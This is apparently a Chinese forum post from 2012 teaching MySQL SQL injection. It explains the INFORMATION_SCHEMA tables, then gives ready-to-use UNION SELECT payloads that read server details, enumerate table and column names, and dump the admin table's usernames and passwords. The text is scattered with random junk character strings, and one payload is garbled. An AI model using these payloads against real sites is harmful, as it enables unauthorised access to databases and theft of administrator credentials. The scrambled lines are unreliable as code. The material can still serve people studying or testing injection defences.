本文介绍MYSQL盲注的一些语句和方法! D3 e. ^$ J) Y) B$ l0 c5 D
7 H# Z2 @8 O- |. G" O
学习盲注前先了解下 IFORMATION_SCHEMA 库
& s. T0 w* o2 J, k& b3 d% b8 q9 y
4 n1 K8 A7 q1 `2 _* ?Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有4 ^/ P/ f0 `4 Q, [8 }- }
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
+ x: N& c0 _4 Q6 j1.得到所有数据库名:
9 \# ]" B% M: {) ?9 ^4 o" I|SCHEMATA ->存储数据库名的表# z$ N+ B' B2 r
|---字段:SCHEMA_NAME ->数据库名称
8 }0 w( V2 v* P4 w( z2 t7 x$ J4 n n3 ^+ i$ z S- a/ v
|TABLES ->存储表名
4 o0 I( M0 |2 J$ [9 `" f|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
7 @6 S+ n& P) O9 q& v ]: B$ q! }|---字段:TABLE_NAME ->存储表的表名
) R* P; v2 c- |' K
: G# {. n4 C) R|COLUMNS ->存储的字段名表
& _! \$ v; B- e4 ?+ _# ?( b( ]|---字段:TABLE_SCHEMA ->该字段所属数据库名
$ W2 c( u9 ^" I* o: z. E( n3 o|---字段:TABLE_NAME ->存储所属表的名称
! s* c% N& B- D- }
0 M' Q2 m" U+ B& P: s2 c! n3 Y+ Z|---字段:COLUMN_NAME ->该字段的名称& A7 F; O9 g d
}* m: i$ k% J! t. @& B* Y+ u 2 K5 P/ w' g0 ?& I5 M" S$ @4 i
4 R; z7 c I! B4 L( o* ~###########################################################################+ d$ [, ^3 i3 }8 {: r- ]
" t7 \- a A$ n. V
0x001 获取系统信息:% Q% ^- f/ i; N' f; V2 E
8 o5 [' p% P7 A! i/ Wunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*" H7 j2 Z# N! ~8 ~
; T( T. c: |9 S0 @4 N1 B2 J. c/*3 I# d8 I: R c9 l
4 G9 C9 G+ C: A
@@global.version_compile_os 获取系统版本: g" A. K* a* }4 N1 [# X
4 B! v; T1 j. J4 @4 E
@@datadir 数据库路径: P& ^+ y( l0 V! ?
database() 当前数据库名称
K3 m/ |% `- B3 @* @0x3c62723e 换行HEX值
( ~9 H# D; ~9 t+ o* T/ g8 J% w; _7 S
*/0 h3 G( A3 L$ ~7 f) Z$ L" D
9 n4 \7 w) P6 r" Z
- @ D5 _) ]. E1 s
+ l; O' s- {$ l9 U; r, O; x( ^* h
######################################################################+ `' }1 |, y4 f/ x# t
- w& {1 B& q& x, Q3 c
0x002 获取表名9 L0 I- w! ~' j1 _0 ~
/ Z; I! k: q* t: n
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*8 C7 ~( Y- b3 C+ h, E" \ ^+ z/ I) u
" s: k6 D( w- q* B7 L9 K5 \
- f/ ?$ D6 u' Y1 N0 Z" `+ r
% f( x1 B& d5 `: C4 J3 L/ l x) t/*
* w/ q( J0 z9 v" w6 _- D0 P# G4 p8 t! A
0x67617264656e 为当前数据库名
0 j$ X# ^6 ^8 U) s5 Q! V8 O0 x1 H" G+ `
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名8 Y) b3 d! v; k2 _3 A
6 }: `" t2 z& @' @*/
! \9 \0 X# |4 b: {0 z4 d* D
' C+ m0 M0 J4 U) q* h: z######################################################################5 z! Q% O' I- M( ?
+ _$ L9 @6 y1 ~0 A3 S g9 T - C- \* o! u$ n7 J1 c" }
7 S- o% v d9 ^! j& ~* j0x003 获取字段3 R: |; w2 |7 H4 n+ F+ a' e
; c& n' j: g: Z+ x4 t" A
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*5 z, b( h0 O9 {: W! a
+ t9 Q, r' `3 U
/*
) W3 N, y- j5 n' P" g- m( F$ P1 \, h* P
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段( q6 _/ j; b3 m6 d/ o$ g8 s- h
5 [0 ~9 G2 J. Q
0x61646d696e ->选择一个表" X3 Q; p& [: b3 x
& u9 b6 Y' P6 q( u2 O3 h0x67617264656e ->数据库名4 c2 U+ s8 X* U) B/ U' r
+ e/ T/ o9 f/ z/ |- ^, v2 q) t
*/
2 |- J; [5 s& S! l4 S; E; i$ U0 f# `# n
#####################################################################
# u/ Y" ~! C9 K. Z% R) k- H" T. u% v1 x% U2 e1 E) V
$ A" \7 w7 g3 G, [$ ]$ H
L7 B6 {: k5 E \
0x004 获取数据
9 R; g0 o) f0 [$ s$ F) t0 {
+ @( E' V8 }6 o4 X9 [& G1 y8 G* lunion select 1,2,3
9 [' Z- |+ ^0 ]& a/ k/ S X2 ~ v,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin# J) F0 w. c( S' v
$ V6 \- l. a- ?: O: z2 T. c
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
, x& h, m* U# r, m8 D- C( ?- g5 X
7 X L6 E* ]) I% z4 a
% D2 U: x/ R" ~4 Q+ ]/*
/ L9 L r5 e4 w) j" U5 U9 T9 n8 V/ z- r7 ?
0x3c62723e 换行符号HEX编码
3 {: c. ~) q9 b# ~8 z: M; ~8 V8 o+ C$ D# s
group_concat 同时获得该字段所有数据
, q( S( ~0 {& Y* O$ ?7 g: F! y
! r% b0 L6 D$ L$ b L6 S8 Z3 H. s*/; K1 U+ e3 m( Z: Z5 L3 ~, g9 H
# `$ B- n; @ m" ]' V |
发表于 2012-9-13 17:48:44
收藏
支持
反对